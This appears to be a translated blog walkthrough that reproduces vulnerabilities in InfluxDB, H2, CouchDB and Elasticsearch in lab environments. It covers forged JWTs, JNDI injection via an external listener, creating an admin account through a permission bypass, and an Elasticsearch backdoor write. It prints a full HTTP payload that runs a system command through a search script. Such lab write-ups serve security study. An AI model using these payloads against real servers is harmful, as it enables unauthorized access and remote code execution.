InfluxDB is an open-source time-series database designed to handle high write and query loads for large-scale data processing and analysis. It is optimized for storing and querying large amounts of time-stamped data in real time.

InfluxDB provides a SQL-like query language called InfluxQL that allows users to retrieve and manipulate data from the database. It also supports various client libraries and plugins for integration with other data sources and tools.

Some key features of InfluxDB include:

High write and query performance: InfluxDB is optimized for high-throughput data ingestion and retrieval, making it ideal for real-time data processing and analysis.
Data retention policy: InfluxDB allows users to set data retention policies to automatically expire old data, helping to manage database size and improve performance.
Tags and filtering: InfluxDB supports tags, which are key-value pairs that can be used to filter and group analysis data.
Continuous Queries: InfluxDB allows users to define continuous queries that run in the background and automatically calculate aggregated values from raw data.
InfluxDB Cloud: In addition to the open-source version of InfluxDB, there is also a cloud-hosted version called InfluxDB Cloud that provides a fully managed, scalable database-as-a-service solution.

Overall, InfluxDB is a powerful tool for managing and analyzing time series data and is widely used in various industries such as finance, healthcare, and IoT.

2. Security issues

When the user enables authentication but does not set the parameter shared-secret, InfluxDB will use an empty string as the authentication key to sign and verify the JWT. In this case, an attacker can use a forged JWT to impersonate any user identity and execute SQL statements in InfluxDB, which may lead to serious security issues.

3. Vulnerability recurrence

Start the range environment.

Scan the environment port, you can see that port 8086 is open.

Search the influxdb vulnerability directly on the Internet, and you can see many reproduction tutorials.

We open the website and add the content shown in the figure below at the end of it, and you can see the following page after visiting.

After accessing the following path and uploading the following parameters by post, a login box will pop up, which means that this operation can only be performed after login and authorization.

When we don't enter anything, the webpage will report the following error.

Because of its unauthorized access vulnerability, and this unauthorized access uses jwt, jwt can be simulated to generate a token whose user is the admin user, and the exp timestamp (representing the expiration time of the token) is greater than the current time.

Encrypt the following content in " JSON Web Tokens - jwt.io " and leave the key blank.

Copy the key generated above and paste it into the data package.

After sending the data packet, you can see that the data has been successfully queried.

2. H2database-unauthorized access-improper configuration

1. Introduction to H2database

Default port: 20051 .

H2database is an open source Java embedded relational database management system (RDBMS), which is lightweight, high performance, and easy to use. It supports standard SQL language and JDBC API, can store data in memory or on disk, and provides advanced features such as transaction management, index, trigger, stored procedure, etc.

Features of H2database include:

Embedded: H2database can be embedded in Java applications, so no independent database server or additional configuration is required, making applications easier to deploy and manage.
High performance: H2database is designed as a lightweight database, so it has very high performance and can handle a large number of data operations.
Support multiple modes: H2database supports many different modes, including memory mode, disk mode, mixed mode, etc. You can choose the most suitable storage mode according to specific application scenarios.
Compatibility: H2database fully supports standard SQL language and JDBC API, so it can be easily integrated with other database systems.
Scalability: H2database supports advanced features such as transaction management, indexing, triggers, and stored procedures. It also supports writing custom functions and stored procedures using Java code, so it is very flexible and scalable.

In general, H2database is a feature-rich, easy-to-use, high-performance Java embedded relational database management system, suitable for various application scenarios, including mobile applications, desktop applications, web applications, etc.

2. Security issues

H2 database comes with a web management page, which can be used to access and manage the database through a browser.

In Spring development, if you set the following options to true, you can allow external users to access the web management page without authentication:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

The spring.h2.console.enabled option is used to enable the Web management page of the H2 database;

The spring.h2.console.settings.web-allow-others option is used to allow external users to access the page.

If these two options are enabled, it will make the web management page vulnerable to attack. Using this management page, we can perform JNDI injection attacks and execute arbitrary commands in the target environment.

3. Vulnerability recurrence

Start the range environment.

Download JNDI-Injection-Exploit - https://github.com/welk1n/JNDI-Injection-Exploit.git .

Replenish:

JNDI injection is an attack that can exploit the Java Naming and Directory Interface (JNDI) to perform Remote Command Execution (RCE) attacks. An attacker can use JNDI injection to inject a malicious JNDI object into the target application and make it execute malicious code when the application tries to use the JNDI object.

When attacking with JNDI injection, some tools can be used to automatically generate malicious JNDI objects and inject them into the target application. Among them, JNDI-Injection-Exploit is an automated tool that can exploit JNDI injection vulnerabilities to perform remote command execution attacks.

-C - The command to execute in the remote class file.

-A - server address, can be IP address or domain name.

After downloading and running on the desktop, a JNDI link is generated.

After copying the link, open the control terminal, and you can see that you need to log in.

First check the current directory of the server.

Change the contents of the two boxes shown in the figure below to the following.

Click "Connect".

Check the server's directory again and find that nothing has changed.

Checking the monitoring status found that nothing was monitored.

What is the reason?

It is because this jar package is called remotely when attacking, but we are monitoring locally, so there will be no new content on the server, so we need to use a host on the external network to monitor it. will succeed.

Use the external network host to generate and monitor again, and copy it.

After pasting it to the specified location again, click "Connect".

At this point, you can see that the content was successfully monitored.

The file directory also successfully added a file.

3. CouchDB-permission bypass and RCE-vulnerability

1. Introduction to CouchDB

Default port: 5984 .

CouchDB is a document-oriented NoSQL database that uses JSON as the document data format and uses RESTful APIs to provide data access interfaces. Following are some of the features and benefits of CouchDB:

Distributed database: CouchDB is a distributed database that supports multi-node replication and synchronization, and can realize data backup and recovery between different servers.
Document-oriented: CouchDB adopts a document-oriented data model. Each document is a self-contained data structure that can store any type of data without following a fixed table structure.
RESTful API: CouchDB uses RESTful API to provide data access interface, supports HTTP protocol, and can perform data operations through simple HTTP requests.
MapReduce view: CouchDB uses MapReduce view to process and query data, and can perform association query and aggregate calculation between different documents.
ACID transaction support: CouchDB supports ACID transaction features, which can ensure data consistency, reliability and recoverability.
Scalability: CouchDB has good scalability and flexibility, and can be expanded horizontally and vertically as needed.
Open source and free: CouchDB is an open source and free database software that can be used and modified on various platforms for free.

CouchDB is suitable for application scenarios that need to store and process unstructured data, such as web applications, mobile applications, social networks, and collaborative office. Since CouchDB has good scalability and distributed characteristics, it is also suitable for application scenarios that need to process large-scale data and high concurrent requests.

2. Security issues

Due to the difference in JSON parsing methods between Erlang and JavaScript, the statement execution is different. This vulnerability allows any user to create administrators, which is a vertical permission bypass vulnerability.

3. Vulnerability recurrence

Start the range environment.

After visiting, you can see the following page.

Grab the data packet and change the data packet to the following style, you can see that it is a failure at this time.

Modify the data packet again and send a data packet containing two roles to bypass the restriction. You can see that it is successful at this time. At this time, the administrator account is successfully created. The account name and password are both "vulhub".

Enter the address below, enter your account number and password, and click Login.

You can see that you have successfully logged in.

4. ElasticSearch-file writing & RCE-vulnerability

1. Introduction to Elastic Search

Default ports: 9200 9300 .

Elasticsearch is a Lucene-based search engine and a distributed document storage and analysis engine. Following are some of the features and benefits of Elasticsearch:

Distributed architecture: Elasticsearch adopts a distributed architecture, which can store and process data on multiple nodes and support horizontal expansion of data.
Real-time search: Elasticsearch provides real-time search and analysis functions, and can return search results within milliseconds.
Multiple data source support: Elasticsearch supports multiple data sources, including structured data and unstructured data, and can store and process various types of data.
Full-text search: Elasticsearch adopts full-text search engine technology and supports functions such as text word segmentation, approximate matching, and aggregation analysis.
RESTful API: Elasticsearch provides a RESTful API interface, which can perform data manipulation and query through HTTP requests.
Big data processing: Elasticsearch supports large-scale data storage and processing, and can handle PB-level data.
Real-time monitoring and analysis: Elasticsearch provides real-time monitoring and analysis functions, which can monitor and analyze data in real time, helping users quickly find and solve problems.
Open source and free: Elasticsearch is an open source and free software that can be used and modified for free on various platforms.

Elasticsearch is suitable for application scenarios that require searching, analyzing, and processing large amounts of data, such as log analysis, search engines, e-commerce sites, social networks, and the Internet of Things. Since Elasticsearch has good scalability and distributed features, it is also suitable for application scenarios that need to process large-scale data and high concurrent requests.

2. Vulnerability recurrence-1

Find the corresponding environment in the online shooting range.

Start the environment.

9200 is generally a common port of ElasticSearch, and this vulnerability environment needs to be used with middleware.

It is found that the elasticsearch page exists on port 9200, and the tomcat directory exists on port 8080

Use ElasticSearch to write the backdoor to usr/local/tomcat/webapps/wwwroot/

path of movement.

configuration.

Access the corresponding address and use the parameter f to control the content to be written.

Access the corresponding path, and you can see that the parameters have been successfully written.

3. Vulnerability recurrence-2

Find the corresponding environment in the online shooting range and start it.

First of all, the vulnerability requires at least one piece of data in es, so we need to create one piece of data first.

Capture packets after accessing the range address.

Change the packet to the following style and drop the packet.

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

Then change the data package to the following style, put the package, and you can see that the corresponding command has been successfully executed.

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}